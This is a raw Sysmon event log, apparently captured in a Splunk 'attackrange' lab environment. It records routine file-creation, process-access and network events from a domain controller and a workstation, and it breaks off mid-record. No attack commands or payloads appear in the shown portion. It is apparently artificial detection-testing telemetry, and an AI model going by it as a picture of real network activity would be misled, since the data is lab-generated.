23542300x80000000000000005917010Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:05.832{896A638B-B5CA-6058-1200-00000000AE01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=47387650DAEE27CBCA5A7827745B82F9,SHA256=A66AFFA2BC8116A06EA881BE303647EEE92F74D6E2E80C4DC2393FE598EDF10A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917009Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:05.715{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917008Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:05.715{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917007Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:05.563{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F602E1281F65E0CA81FA6AB36C66A110,SHA256=BFDD8B3054A77821200664AB69D2DF547580CA248A14895654F9B69BEACF60C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638397Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:05.445{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C33B96EB2B0803B4F50543E82778B7,SHA256=47B132A22DE8ADBDC6FB3C9EBE29BE1E67DDCBFE09BEAF2F2D6D60E1FEBEF71C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917006Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:05.303{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA41151DC44DC1FFB08AF211791F1743,SHA256=4307EBD2D43EE34337780177C7ED79AECB3388D1E90DAAB7C45D50D2ADA97AC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917015Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:06.715{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917014Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:06.715{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917013Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:06.712{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917012Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:06.660{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C5F916F02BB3B43907F238D5865858,SHA256=F41BBDBEE92176C9D249D169E85C01ED46AACBEDFB689DBDB26E087A344858C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638400Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:02.507{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57244-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638399Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:06.461{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19A035DD9A5A92B086693030C01063B3,SHA256=0B9F7D915C47080A82D7D7C8266E71D05882F8A0B9CA892F1C9607C8877FE728,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917011Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:06.650{896A638B-C9AE-6058-4C07-00000000AE01}34207628C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cc30|C:\Program Files\Mozilla Firefox\firefox.exe+2c783|C:\Program Files\Mozilla Firefox\firefox.exe+40ae0|C:\Program Files\Mozilla Firefox\firefox.exe+407dc|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638398Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:06.242{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D9A36CA28C2966BB3C586FC8700FCDD,SHA256=EFDCCC6DB4C84879F6E13121D9464D71AACEA186486EBA84A6E58AC0D32CD1D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917019Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:07.716{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917018Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:07.716{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917017Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:07.675{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=711A02ED510502353768D77F15FAFBDE,SHA256=8061AC914E8E0E1E144A2AFE36D7AB7B226B5BB5EA68484E44BEC5305F8AECBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638402Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:07.461{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD1E3D7A820672FA20699BCCDCD83CB7,SHA256=1C0AACFDE4A49E84BA18EA07295208F862535FE6BF2574735C7338C282F19F6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917016Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:03.747{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1482-false10.0.1.12-8000- 23542300x8000000000000000638401Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:07.273{BFB545BB-B8FB-6058-A200-00000000AF01}3640NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917022Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:08.766{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BCC0E276C3C6396737E5AAC2BE4856F,SHA256=0592F101F102AEFDBC946B80AD339CCB6EDB57301665A647C122B5FFBC11E83A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638405Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:04.554{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57245-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000638404Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:08.492{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F61F24D454112C3D69B76B8BFE25FF1,SHA256=0C36510011B7D00DCCDB4836451A89DB8DAC574A636FF8440F0E68394CD7F6A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917021Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:08.716{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917020Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:08.716{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638403Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:08.336{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFB0FB3E08EBF482AC3D1FA358067B5B,SHA256=70E17048B0E2A9E0EFE509097BFF007629176FF34B1C1F8354D3B2202ECEF8AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917025Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:09.864{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B6FAC4B4B6531D0F94D1C9A25BEE521,SHA256=502015F35BFC466F3D24AB7CB7D0D0DC146DC02D942D5F864A935B9C9AF93231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638406Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:09.523{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97DB5A74E6AEF7D5164F04FF5C173C40,SHA256=DE4A77462E6B2C16A828A259A385157C0852B704C4671916D374E72E5B24A0A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917024Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:09.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917023Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:09.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917028Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:10.866{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AA0AE81A7AD7EC892E5A64FD2B4F10,SHA256=56D92BAF836282B4AC2BE670D882F2E5BD0CEF984D20DE6D7B084999A9358346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638407Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:10.554{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA22E488ACDF34DC7FF492AE58649A5B,SHA256=1C7DD0ECC6AC3B3B8489D8960FFBC599783EA7A2D8B02252DBB09F6C8F4428D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917027Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:10.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917026Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:10.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917040Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.881{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D2E9553E8254A3207E08319523BB25,SHA256=73C9407B7C31DA7A2A6D3B74B80AD6E1DCC85CEED981BDC8C2145D2DED7B0457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638408Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:11.585{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E079CBB5D9D789C60F0793E1004F61B,SHA256=5B7B5A31529052F3613F9C8D1DDF513577413D0B451153D01FD0BF757A9945D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917039Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917038Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.717{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917037Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:08.870{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1483-false10.0.1.12-8000- 23542300x80000000000000005917036Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.202{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BEC1AB0D39B168D91D6BCDC0C692DB6,SHA256=CD4860674DCA5061DF5758478212571C06613790BAD687BFE19BACE6E2235BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917035Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.200{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0FB39801D953830C5C0E8D0A39774A0,SHA256=8324A1726C3DD68E31498345DF60CB2FC7374436A782DF7D6F8B2A5AE97198DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917034Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.169{896A638B-B8E2-6058-B102-00000000AE01}42447692C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917033Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 